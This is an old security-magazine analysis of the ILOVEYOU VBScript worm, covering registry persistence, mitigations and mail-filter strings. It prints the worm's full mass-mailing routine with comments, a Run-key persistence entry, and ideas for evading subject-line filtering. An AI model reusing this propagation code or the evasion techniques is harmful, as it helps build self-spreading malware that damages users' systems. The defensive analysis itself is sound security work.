Somebody Loves You - An Analysis of the ILOVEYOU Worm

posted onJune 28, 2000

by hitbsecnews

This article
first appeard on 2600 Australia

Reference
Links:

Microsoft
- developers of VBScript

MS
Scripting Technologies - home page

MS
VBScript - home page

Introduction
Hype Hype Hype Hype Hype - the media has gone into a frenzy these last
few days regarding the latest worm virus to hit the Internet. Damage figures
ranging from a few million dollars up to ten billion dollars have been
thrown up into the air. The author of the worm (thanks to the nice coments
he made in the code) has been tracked down to Manila in the Phillipines
and, as of 8/5/2000, police there have arrested a man.
How is it that something as simple as this can cause so much damage and
get the worlds attention? Who is at fault? can this be stopped in the
future?
About
This worm is a simple VBScript (Visual Basic Scripting Language) that
modifies system contents and then spawns itself to spread in a number
of ways. The VBScript interpretation/runtime engine comes installed with
Microsoft Windows (even though you might not want it) and is used to process
and execute client side VBScript files. This means that all the components
required to write, test and spread a worm as destructive as ILOVEYOU come
built-in to Microsoft Windows.
Who is at fault? The fault does not lie in Microsoft Outlook, not in mIRC
(a popular IRC client) or any of the other pieces of software used to
propagate the worm - the fault is in the native support and the ease of
execution of VBScript on Windows 95/98/NT.
To demonstrate how easy this is, create a new text file and call it test.vbs.
Open it in notepad and add the following lines:

set
test=CreateObject("WScript.Shell") test.RegWrite "HKEY_LOCAL_MACHINESoftwareCLASSESCLSID{645FF040-5081-101B-9F08-00AA002F954E}",
"/dev/null"

now save
the file, close notepad, and double-click to execute. You just changed
the name of your Recycle Bin to "/dev/null" (the classically Unix name
for the bin)... Easy? Yes, but also very scary. Email it to your whole
contact list as an attachment for fun. (the name will change on the next
restart of Windows, to change it back, just re-run the script with the
name you want inplace of "/dev/null")
If you followed this example, you'll notice that execution of the script
was close to instantaneous, no warning prompts were presented to the user,
and in some cases, you might not have even noticed that it worked.
Protection

It's possible to stop these scripts from executing on your system, thus
stopping worms/viruses from causing damage. The name of the file that
interprets/runs all client-side VBScripts is called WSCRIPT.EXE and can
be renamed or deleted accordingly. On Windows 95/98 it's located in C:WINDOWS
and in C:WINNTSYSTEM32 on Windows NT/2000. Although renaming constitutes
little more than "security by obscurity", VBScript is effectively kneecapped.
For some users, VBScript can't be disabled because it's actively used
for workflow automation etc. In such cases, user education about opening
of attachments from any source becomes essential. For the rest of us,
the next worm will be little more than another annoying message to delete
rather than a threat to the operation of your computer or your business.
If scripting is your lifeblood, perhaps investigate other client-siide
scripting options such as Perl.
In the midst of this, Microsoft needs to come up with a reliable, long-term
solution to the problem of worms/viruses of this nature. How about prompting
users when registry changes are attempted by a script? Were this implemented, the ILOVEYOU worm would not have been able to alter the following registry
key that means it re-infects the computer each time it is restarted:

[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun] "MSKernel32"="C:WINDOWSSYSTEMMSKernel32.vbs"

How about
protecting those registry keys that are commonly used by worms and trojans
so that they cant be modified without user authorisation? Double-clicking
(or single clicking with certain versions of Internet Explorer) on a .vbs
file should trigger a "Are you sure you want to execute this script, it
could contain malicious content" warning/prompt. Microsoft already does
something similar for scripts that are included in the body of a email
message, controls/scripts that are embeded into webpages and in macro
scripts embedded in Word, Excel, Powerpoint documents, but this concept
has yet to filter through to the "Active Desktop".
Despite all this, the fault isnt solely in VBScript - a worm could also
be in the form of a batch script (.BAT), it just happens to be that VBScript
is powerful, easy to use and not often recognised by users as something
worthy of attention. There has to be a full layer of security that can
monitor and capture events then trigger a warning to the user when something
strange is happening. There could be defined actions that are flagged
as "unusual", in which case the user is asked whether they want this to
be done. Such actions might include mass deletion of files, insertion/modification/deletion
of registry keys, spawning of itself or other scripts and other common
actions that have been seen in worm viruses over the last few years. The
fact that most worms/viruses use similar tactics to infect targeted machines
and subsequently spread to other computers means we atleast have some
means of stopping rudimentary variants in future.

I've
edited up to here

We can
go further up the chain and block the worm at the server. Many mail servers
(sendmail) and other detection systems allow filtering of incoming messages
to be done. To set up filtering for your respective mail server, red up
in the manual. You might have to install a seperate filtering/capture
program depending on you Operating System/mail server and setup.
Some basic
things that we can filter for are firstly subject lines of emails to detect
known worms, known message bodies and attachment names. After this we
can go further by blocking all emails with a .vbs file as an extension
or using unique strings from a known worm to block it. So for the ILOVEYOU
worm, some possibilities to scan for could include the strings: "LOVE-LETTER-FOR-YOU"
"scriptini.WriteLine ";Khaled Mardam-Bey"" - or something more random
like: "(ext = "wsh") or (ext = "sct") or (ext = "hta") then" replace(code,chr(91)&chr(45)&chr(91),chr(39))"
it might be a good idea to block any email with VB commands in the attachment
that could mean its a worm, such as. .RegWrite .GetSpecialFolder .OpenTextFile
which are properties used to write to the registry, get the system folder
name and open a txt file for writing, respectively.
Writing
The basic workings of a worm are enter, do whatever you want it to do,
then spawn. The worms that we have seen thus far (including the latest
"ILOVEYOU" worm) are all very ameture. The authors of the latest worm
shows little programming knowledge in his code, it is very rough and the
underlying methods used in the worm are simple, yet somehow effective.
What would happen if somebody with a bit more skill and malicious intent were to write something up?
The main characteristic of a worm is the way it spreads itself. Going
back to our recycling bin example from above, it would only require an
extra few lines of code for that to become a worm. All that needs to be
done is a method for the worm to spawn itself and spread. The common methods
seen have been mailing itself to the contact list of the user, or trojaning
other programs (such as mIRC). Lets look at how the ILOVEYOU worm does
this.
It is all done in a function called spreadtoemail() which uses the convenient
Microsoft MAPI control. This is one of the final steps in the worm, by
this time it has already caused the damage on the system and is now looking
at ways to spread. The step before this was to create the file "LOVE-LETTER-FOR-YOU.TXT.vbs"
in the system directory. In the spreadtoemail() process, this file is
attached to the email. I have added comments to this code to explain the
process, this same function could be used in our recycling bin example
above to make it behave like a worm.

sub spreadtoemail()
On Error Resume Next ' if there is an error, keep going

dim x, a, ctrlists, ctrentries, malead, b, regedit, regv, regad ' variables

' define objects to be used in this process

set regedit = CreateObject("WScript.Shell")
set out = WScript.CreateObject("Outlook.Application")
set mapi = out.GetNameSpace("MAPI")

' for every entry in the Addresslist do the following process.

for ctrlists = 1 to mapi.AddressLists.Count

' set "a" to the current addressbook

set a = mapi.AddressLists(ctrlists)
x = 1
regv = regedit.RegRead("HKEY_CURRENT_USERSoftwareMicrosoftWAB" &
a)

if (regv = "") then
regv = 1
end if

' check to see that we can proceed with this addressbook by checking
our number against the
' number of books (lists)

if (int(a.AddressEntries.Count) > int(regv)) then

' do for each entry in this list, construct the message then send it

for ctrentries = 1 to a.AddressEntries.Count
malead = a.AddressEntries(x)
regad = ""
regad = regedit.RegRead("HKEY_CURRENT_USERSoftwareMicrosoftWAB"& malead)

if (regad = "") then

' construct message - simple

set male = out.CreateItem(0)
male.Recipients.Add(malead) ' recipient
male.Subject = "ILOVEYOU" ' subject
male.Body = vbcrlf & "kindly check the attached LOVELETTER coming from
me." ' body
male.Attachments.Add(dirsystem & "LOVE-LETTER-FOR-YOU.TXT.vbs") ' attach
male.Send ' SEND !
regedit.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWAB" & malead,
1, "REG_DWORD"
end if
x = x + 1
next
regedit.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWAB"&a,a.AddressEntries.Count
else
regedit.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWAB"&a,a.AddressEntries.Count
end if
next

Set out = Nothing
Set mapi = Nothing
end sub

Done. We've
just sent a email to every person in our address book/s with the file
attachment that was produced in the system directory, subject line of
"ILOVEYOU", and a message body of "kindly check the attached LOVELETTER
coming from me.". One weakness of the worm stands out in this function,
the fact that the subject line, message body and attachment name are hard-coded
and will be easily detectable down the track. It will need someone to
pick it up down the track and change these settings for it to survive
(as we have seen with the many clones of the "ILOVEYOU" worm). What if
we were to make the Subject line, message body and attachment name totaly
dynamic? meaning, they are not always the same and therefor will be harder
to stop. The main method system administrators, anti-virus companies,
the media and Microsoft used to warn people of this virus was based on
the subject line. Millions of people world-wide were welcomed to work
that morning with warnings not to open any emails with that specific subject
line. So of all the lines of code in the worm, the main protection against
it is based on the following lines of code:
male.Subject = "ILOVEYOU"
male.Body = vbcrlf & "kindly check the attached LOVELETTER coming from
me."
male.Attachments.Add(dirsystem & "LOVE-LETTER-FOR-YOU.TXT.vbs")

I'm about
to go into detail on some methods that can be used to make a worm more
effective and dangerous, I could do it here, or I could actually code
the worm and let you find out the hard way. Its just a shame that it takes destruction to get attention. The first method that can be used it to
have a large array of different subject lines, and for one to be randomly
chosen when the message is constructed. This would mean that instead of
looking for one subject line, people have to watch for many. Lets say
we come up with 100 different subject lines, which one were to be randomely
chosen and used to pass the worm on. We use trivial and common subject
lines such as "RE: joke", "Offer", "Returning your call" or even go as
far as having something simple as just a blank subject line. The amount
of work required to stop the worm on the basis of subject line would become
exponantial. Can we go further in terms of subject line? Yes. We can go
into the Inbox of the client, we can retrieve all the email addresses
of recieved emails, and their respective subject lines. We add an "RE:"
to the begining of the recieved message, and send it to that user. In
this case we now have a totaly dynamic Subject line amd we are sending
a reply to EVERYBODY who has ever sent us a message, not only our contact
list. With this method, we have changed the "Dont open any emails with
'ILOVEYOU' in the subject line" warning to "Dont open ANY emails".